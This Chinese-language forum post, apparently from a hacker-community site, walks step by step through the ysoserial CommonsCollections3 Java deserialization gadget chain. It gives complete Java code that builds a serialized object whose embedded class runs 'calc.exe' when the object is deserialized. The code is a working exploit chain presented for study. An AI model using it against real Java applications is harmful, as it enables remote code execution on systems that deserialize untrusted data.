中国红客联盟国际站联盟介绍联盟架构联盟章程发展历程联盟邮箱积分VIP捐助联盟收藏本站
请登录
立即注册
门户首页
交流社区BBS
技术圈子Group
关于我们
红客大事记
插件Plugin
搜索
当前位置:»交流社区 中国红客联盟【技术分享区】 编程脚本交流 Java安全 ysoserial CommonsCollections3示例 ...

[JAVA] Java安全 ysoserial CommonsCollections3示例分析

1805 0
Honkers 2022-11-8 17:53:13 | 显示全部楼层 |阅读模式
目录

    cc3利用链如下:
      一、为构造的恶意字节码文件找一个newInstance启动入口
        构造恶意类:加载的字节码类需要继承AbstractTranslet
      二、将字节码内容直接赋值序列化三、让newTransformer得到执行



cc3利用链如下:
  1. TrAXFilter(Templates templates)
  2.     TemplatesImpl->newTransformer()
  3.         TemplatesImpl->getTransletInstance()
  4.             _class[_transletIndex].newInstance();
复制代码
一、为构造的恶意字节码文件找一个newInstance启动入口

在TemplatesImpl类中的getTransletInstance方法,对 _class[_transletIndex]实现了newInstance()。
所以如果构造一个恶意类,然后通过类加载器加载,最终通过TemplatesImpl实现这个类的实例化,将实现这个恶意类的初始化执行。
假设将恶意代码写入这个类的静态代码块中,在这个类被实例化的时候得到执行,以Runtime为例。

构造恶意类:
  1. public class Runtimecalc {
  2.     {
  3.         Runtime runtime = Runtime.getRuntime();
  4.         try {
  5.             runtime.exec("calc.exe");
  6.         } catch (IOException e) {
  7.             e.printStackTrace();
  8.         }
  9.     }
  10. }
复制代码
又由于TemplatesImpl类中,getTransletInstance方法属于私有方法,所以需要依赖另一个方法。其中该类的newTransformer()调用了getTransletInstance(),该方法public作用域,可以被外部调用执行。
  1. public synchronized Transformer newTransformer()
  2.         throws TransformerConfigurationException
  3.     {
  4.         TransformerImpl transformer;
  5.         transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
  6.             _indentNumber, _tfactory);
  7.         if (_uriResolver != null) {
  8.             transformer.setURIResolver(_uriResolver);
  9.         }
  10.         if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
  11.             transformer.setSecureProcessing(true);
  12.         }
  13.         return transformer;
  14.     }
复制代码
通过反射给_class和_transletIndex赋值。但是在赋值之前,我们看到getTransletInstance方法对_name也做了判断if (_name == null) return null;,要求不能为空才可以继续执行后面代码,所以还需要通过反射给_name赋值。
另外需要注意的是由于这里做了一个强转(AbstractTranslet)_class[_transletIndex].newInstance();

加载的字节码类需要继承AbstractTranslet
  1. private Translet getTransletInstance()
  2.         throws TransformerConfigurationException {
  3.         try {
  4.             if (_name == null) return null;
  5.             if (_class == null) defineTransletClasses();
  6.             // The translet needs to keep a reference to all its auxiliary
  7.             // class to prevent the GC from collecting them
  8.             AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
  9.             translet.postInitialization();
  10.             translet.setTemplates(this);
  11.             translet.setServicesMechnism(_useServicesMechanism);
  12.             translet.setAllowedProtocols(_accessExternalStylesheet);
  13.             if (_auxClasses != null) {
  14.                 translet.setAuxiliaryClasses(_auxClasses);
  15.             }
  16.             return translet;
  17.         }
  18.         catch (InstantiationException e) {
  19.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
  20.             throw new TransformerConfigurationException(err.toString());
  21.         }
  22.         catch (IllegalAccessException e) {
  23.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
  24.             throw new TransformerConfigurationException(err.toString());
  25.         }
  26.     }
复制代码
那么假设我们通过反射,直接为_class赋值为一个恶意字节码文件的文件路径。
然后通过调newTransformer方法实现,就能得到字节码文件的初始化执行。
  1. TemplatesImpl templates = new TemplatesImpl();
  2. Class templates_cl= Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
  3. Field name = templates_cl.getDeclaredField("_name");
  4. name.setAccessible(true);
  5. name.set(templates,"xxx");
  6. Field aClass = templates_cl.getDeclaredField("_class");
  7. aClass.setAccessible(true);
  8. aClass.set(templates,new Class[]{Runtimecalc.class});
  9. Field transletIndex = templates_cl.getDeclaredField("_transletIndex");
  10. transletIndex.setAccessible(true);
  11. transletIndex.set(templates,0);
  12. templates.newTransformer();
复制代码
二、将字节码内容直接赋值序列化

字节码文件路径是无法在目标机器得到执行的,所以需要找到其他方法将字节码内容直接赋值序列化
Runtimecalc.class作为类文件赋值,是无法实现序列化的时候将文件内容直接传入的,这里赋值的只是文件路径。
所以序列化和反序列化是不成功的。
我们知道ClassLoader在加载的类的时候,最终是通过defineClass加载字节码文件内容。
利用这种方式,直接的赋值传参内容是字节码,就可以达到恶意类加载的序列化和反序列化。
Templateslmpl类中getTransletInstance方法中,在_class[_transletIndex].newInstance()执行前,还有一段如下代码
  1. if (_class == null) defineTransletClasses()
复制代码
假设我们之前不对_class赋值,查看defineTransletClasses做了什么。
  1. private void defineTransletClasses()
  2.         throws TransformerConfigurationException {
  3.             //需要给_bytecodes赋值
  4.         if (_bytecodes == null) {
  5.             ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
  6.             throw new TransformerConfigurationException(err.toString());
  7.         }
  8.             TransletClassLoader loader = (TransletClassLoader)
  9.             AccessController.doPrivileged(new PrivilegedAction() {
  10.                 public Object run() {
  11.                     return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
  12.                 }
  13.             });
  14.         try {
  15.             final int classCount = _bytecodes.length;
  16.             //为_class赋值,长度为_bytecodes的长度
  17.             _class = new Class[classCount];
  18.             if (classCount > 1) {
  19.                 _auxClasses = new HashMap<>();
  20.             }
  21.             for (int i = 0; i < classCount; i++) {
  22.                 //_bytecodes[0]赋值为字节码内容赋值给_class[0]
  23.                 _class[i] = loader.defineClass(_bytecodes[i]);
  24.                 final Class superClass = _class[i].getSuperclass();
  25.                 // Check if this is the main class
  26.                 if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
  27.                     _transletIndex = i;
  28.                 }
  29.                 else {
  30.                     _auxClasses.put(_class[i].getName(), _class[i]);
  31.                 }
  32.             }
  33.         }
  34.     }
复制代码
  1. private byte[][] _bytecodes = null;
复制代码
_bytecodes是一个byte二维数组,我们将byte[]类型的字节码赋值给_bytecodes[0]
这里就直接赋值字节码内容了
  1. byte[] code = Files.readAllBytes(Paths.get("D:\\workspace\\javaee\\cc1\\target\\classes\\com\\cc3\\Runtimecalc.class"));
复制代码
这样在defineTransletClasses被调用的时候
执行_class = loader.defineClass(_bytecodes);
_class[0]将会被赋值为loader.defineClass(code)
由于_tfactory需要调用,所以给_tfactory也赋值
最终实现代码如下:
  1. TemplatesImpl templates = new TemplatesImpl();
  2. Class templates_cl= Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
  3. Field name = templates_cl.getDeclaredField("_name");
  4. name.setAccessible(true);
  5. name.set(templates,"xxx");
  6. //注释不给_class赋值,满足_class == null,defineTransletClasses得到调用
  7. //Field aClass = templates_cl.getDeclaredField("_class");
  8. //aClass.setAccessible(true);
  9. //aClass.set(templates,new Class[]{Runtimecalc.class});
  10. Field transletIndex = templates_cl.getDeclaredField("_transletIndex");
  11. transletIndex.setAccessible(true);
  12. transletIndex.set(templates,0);
  13. //加载字节码
  14. byte[] code = Files.readAllBytes(Paths.get("D:\\workspace\\javaee\\cc1\\target\\classes\\com\\cc3\\Runtimecalc.class"));
  15. byte[][] codes = [code];
  16. //给_bytecodes赋值
  17. Field bytecodes = templates_cl.getDeclaredField("_bytecodes");
  18. bytecodes.setAccessible(true);
  19. bytecodes.set(templates,codes);
  20. //要顺利执行,_tfactory得赋值,因为defineTransletClasses中调用了_tfactory的getExternalExtensionsMap
  21. //_tfactorys是TransformerFactoryImpl类型的
  22. TransformerFactoryImpl transformerFactory = new TransformerFactoryImpl();
  23. Field tfactory = templates_cl.getDeclaredField("_tfactory");
  24. tfactory.setAccessible(true);
  25. tfactory.set(templates,transformerFactory);
  26. templates.newTransformer();
复制代码
三、让newTransformer得到执行

TrAXFilter类的构造方法会调用newTransformer
  1. public TrAXFilter(Templates templates)  throws
  2.     TransformerConfigurationException
  3. {
  4.     _templates = templates;
  5.     _transformer = (TransformerImpl) templates.newTransformer();
  6.     _transformerHandler = new TransformerHandlerImpl(_transformer);
  7.     _useServicesMechanism = _transformer.useServicesMechnism();
  8. }
复制代码
  1. TrAXFilter trAXFilter = new TrAXFilter(templates);
复制代码
但是TrAXFilter并不实现Serializable接口,无法序列化,需要通过反射调用
在cc1中反射执行最终是通过InvokerTransformer的transform来实现
这里用了InstantiateTransformer的transform
  1. InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
  2. instantiateTransformer.transform(TrAXFilter.class);
复制代码
剩下的就和cc1一样了
  1. public class CC3Test3 {
  2.     public static void main(String[] args) throws Exception {
  3.         TemplatesImpl templates = new TemplatesImpl();
  4.         Class templates_cl= Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
  5.         Field name = templates_cl.getDeclaredField("_name");
  6.         name.setAccessible(true);
  7.         name.set(templates,"xxx");
  8.         Field transletIndex = templates_cl.getDeclaredField("_transletIndex");
  9.         transletIndex.setAccessible(true);
  10.         transletIndex.set(templates,0);
  11.         byte[] code = Files.readAllBytes(Paths.get("D:\\workspace\\javaee\\cc1\\target\\classes\\com\\cc3\\Runtimecalc.class"));
  12.         byte[][] codes = [code];
  13.         //给_bytecodes赋值
  14.         Field bytecodes = templates_cl.getDeclaredField("_bytecodes");
  15.         bytecodes.setAccessible(true);
  16.         bytecodes.set(templates,codes);
  17.         //要顺利执行,_tfactory得赋值,因为defineTransletClasses中调用了_tfactory的getExternalExtensionsMap
  18.         //_tfactorys是TransformerFactoryImpl类型的
  19.         TransformerFactoryImpl transformerFactory = new TransformerFactoryImpl();
  20.         Field tfactory = templates_cl.getDeclaredField("_tfactory");
  21.         tfactory.setAccessible(true);
  22.         tfactory.set(templates,transformerFactory);
  23.         InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
  24.         Transformer[] transformerslist = {
  25.                 new ConstantTransformer(TrAXFilter.class),
  26.                 instantiateTransformer,
  27.         };
  28.         ChainedTransformer chainedTransformerruntime = new ChainedTransformer(transformerslist);
  29.         HashMap hashMap1 = new HashMap();
  30.         LazyMap lazyMap = (LazyMap) LazyMap.decorate(hashMap1,chainedTransformerruntime);
  31.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  32.         Constructor declaredConstructor = c.getDeclaredConstructor(Class.class, Map.class);
  33.         declaredConstructor.setAccessible(true);
  34.         InvocationHandler handler = (InvocationHandler) declaredConstructor.newInstance(Retention.class, lazyMap);
  35.         Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, handler);
  36.         InvocationHandler handle = (InvocationHandler) declaredConstructor.newInstance(Retention.class, proxyMap);
  37.         ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("D:\\cc3.ser"));
  38.         objectOutputStream.writeObject(handle);
  39.         ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("D:\\cc3.ser"));
  40.         objectInputStream.readObject();
  41.     }
  42. }
复制代码


以上就是Java安全 ysoserial CommonsCollections3示例分析的详细内容,更多关于java安全ysoserial CommonsCollections的资料请关注中国红客联盟其它相关文章!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Honkers

荣誉红客

关注
  • 4004
    主题
  • 36
    粉丝
  • 0
    关注
这家伙很懒,什么都没留下!

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2025 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行